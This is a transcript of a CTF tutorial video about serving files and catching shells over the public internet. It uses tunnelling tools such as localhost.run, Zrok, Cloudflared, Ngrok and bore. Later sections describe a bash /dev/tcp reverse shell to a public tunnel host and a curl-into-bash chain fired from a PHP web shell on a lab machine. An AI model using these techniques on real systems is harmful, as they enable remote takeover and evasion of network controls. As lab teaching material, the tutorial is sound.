Before starting the video, a word of caution. This is for educational purposes only. Please do not do anything illegal. You have been warned. Catching shells and transferring files on platforms like Hack the Box are pretty straightforward, since both machines can easily see each other after connecting to the open VPN. But this can be a challenge when the CTF is on the public internet. This could be solved by using a virtual private server. However, you might not have the budget for the VPS. Exposing services on the public internet by port forwarding the local router may be free, but forgetting to close open ports could leave yourself open to attack. This video will cover tips and tricks for transferring files and catching shells on the public internet without port forwarding the router or hosting everything on a virtual private server. The network setup for these demonstrations will be between two Linux machines, my Kali box hosted on my computer at home, and a machine on the public internet I can reach but can't reach me because the local firewall is blocking the traffic. In this case, the try hack me attack box, since being subscribed gives it a public IP address. For the rest of the demonstrations, my Kali Linux machine will be on the bottom of the TMUX split, and the try hack me attack box will be on top. A quick word of caution. When exposing files on the public internet, it's important to not leak any personally identifiable information. To make sure we don't leak any files we don't want to have on the internet, I'm going to start off with creating an empty directory called www. So anytime we're hosting a file, it's only displayed from this one directory that has no other files. After removing all the duplicate www directories, our first array of demonstrations will cover tooling to help expose HTTP services on the internet. The first tool on the list is SSH Localhost run. The first step is creating our file, so echo tester into test.txt as our supposed file. The next step is to stand up our Python HTTP server that I'm going to use to serve the file. The third step is to expose the service with SSH Localhost run by doing SSH capital R with a remote port forward localhost. We are going to expose our Python web server that is 8000 and make it pass to port 80 on the public internet. And then if we're using local SSH run without an account, we need to do no key at localhost.run. I'm going to zoom in into this and scroll up to get the exposed web resource. In this case, it is this domain. Copy this, zoom back out, and to grab our file, we'll just do curl test.txt. As we can see, tester comes back. We can wget test.txt, and it's on the box. I can remove the file, and it's not found. The next tool on the list is Zrok. You will have to create an account, but after creating your account and authenticating to the tool with your auth token, we can set up our Python web server. Like before, I'm going to listen on port 8000, and then use Zrok to help expose my local Python web server on the internet. With Zrok, share public, and then the port we're hosting locally, which will be 8000. We will get this little URL. Perfect. And now we can do curl our Zrok address, test.txt, and we have our file, like before. The next tool on the list is Cloudflared by Cloudflare. The Cloudflare command supports more than just the HTTP protocol. However, out of the box, without any additional configuration, like creating an account, we can easily spin up a HTTP tunnel to help host our local HTTP service on the public internet. Once you install the tool, in this case on Kali, which is just sudo apt install Cloudflared, which of course I already have installed. If we do apt search Cloudflared, we can see it's already installed. Now to create our tunnel for our Python web server, Cloudflared with the tunnel command --url with our local host on 8000. So that when I listen with our Python web server on the default port of 8000, it will work. All that's left to do is to grab the tunnel web resource, which will be this URL. Now if we do curl to this web resource, we can see that we have a directory listing of the Python web server, in this case the test file like before. Now I can curl test.txt and we get our file. The next tool on the list will be Ngrok. Ngrok supports many different protocols. All you have to do is create an account and authenticate with your account's token. Once you are done with that, the basic syntax for the command is Ngrok, the protocol you'd like to tunnel, and the port of the local service you would like to tunnel. In this example, it will look like this. The only problem is that when the Ngrok tunnel is running, it will display the email you used to create the account and the region you are connecting from. I would be cautious when sharing your screen. Because of this, I'm going to run the Ngrok tunnel in a different TMX window and demonstrate everything in a separate one to prevent leaking information. Starting off with using Ngrok to serve HTTP, which the command I used is Ngrok HTTP with the port 8000 to match our Python web server. Now all that's left to do is request our web server with the web resource that's created, again with the curl command, and as we can see, it works as intended. Now we can request our test.txt file like before, and we get tester back. Proceeding with Ngrok into the second array of demos, which will cover catching a reverse shell on the public internet without a VPS. In this case, I'm going to capture a simple TCP reverse shell with netcat. To set up the tunnel, all you have to do with Ngrok is do Ngrok TCP and then the port, which in this case is going to be 8443. With that setup, I'm going to netcat listen on 8443, and then all we have to do is use the TCP address to create our reverse shell payload. In this case, it will look something like this when you are running the Ngrok tunnel for TCP. To format it for our bash reverse shell, all we have to do is remove the TCP on the front and have it like this, where this part of the domain is our part of the domain here for our lhost, and then the port that it is using publicly, in this case, will be set as the port. So when I get the reverse shell connection on port 11618, it will pass it over to our reverse shell handler listening on 8443. When I run the reverse shell, we see we have a root shell. The last and final tool on the list is called bore. Bore is a REST-based tool that you can install with cargo install bore-cli. I already have it installed, so if I run bore with the help flag, it prints out. The benefit of bore is it tunnels a port that can support any service. So for example, if I'm using an HTTP service, without changing the bore command, I'll be able to use the same port when catching a reverse shell. The basic syntax for bore is bore local the port. In this case, I'll just do 8443 and then to bore.pub. If I was going to create a Python web server, I would do python -m http server 8443, and then what we would do is we would do curl http bore.pub with our port. In this case, it is 31347. And as we can see, our files are exposed. However, if I change what service I am listening, in this case, I listen on 8443 instead without changing the bore command, and then do bash-c, bash-i, dev tcp bore.pub 31347 and 1. As we can see, without terminating the bore tunnel, I'm able to get a reverse shell. For the third and final demo, I'm going to simulate how we can chain all the tools demonstrated in this video to capture a shell with curl into bash for a supposed CTF challenge that has access to the public internet. To do this, there's going to be a PHP web shell on the try-hack-me attack box to act as our simulated command execution for our CTF. Then I will host a Python web server through a tunnel using one of the tools, in this case, SSH localhost run, to host our bash reverse shell. Lastly, I will host the TCP tunnel for our netcat session handler using Ngrok. So when I run the curl into bash command, we have a socket to connect to. Similar to the demos before, I'm going to run Ngrok in the other tunnel tool in a different tmux window to help prevent leaking personal information. The two tools that are going to be chained together are as follows: SSH localhost run for our Python web server and Ngrok for our netcat listener. All that's left to do is set up the services for our tunnels, starting with our Python web server and our netcat reverse shell handler. The final step is to set up our PHP web server on the try-hack-me attack box as our simulated CTF machine for our webshell.php file. Using the PHP command, capital S, we're going to listen on all interfaces on port 9001. Going back into my web browser, we can see that the web shell is password protected. This is an important step to prevent anybody from using the web shell for their own malicious intent. Using the correct password allows us to log in and run commands that we can see with the id command. For the rest of the demonstration for curl into bash, we need to check that curl is installed. We can do this with either type or the which command. Curl has been validated as an installed tool. All that's left to do is curl into bash, where we curl our web resource on localhost run and grab our bash reverse shell and pipe it into bash. When I run the command, the web shell hangs, and if I move this to the side, we can see we have a shell. Navigating back to the home directory, we can see there is a video demo directory that I created that contains our flag. And that concludes this video. I recommend you go out and play. There are a lot more tools for hosting files and catching shells on the public internet without a VPS or port forwarding your router. I will include additional resources of other tools that you might want to try, but I did not cover in the description below. I thank you all for watching, and I hope you learned something, and I'll see you all in the next one. Take care. Have a great day.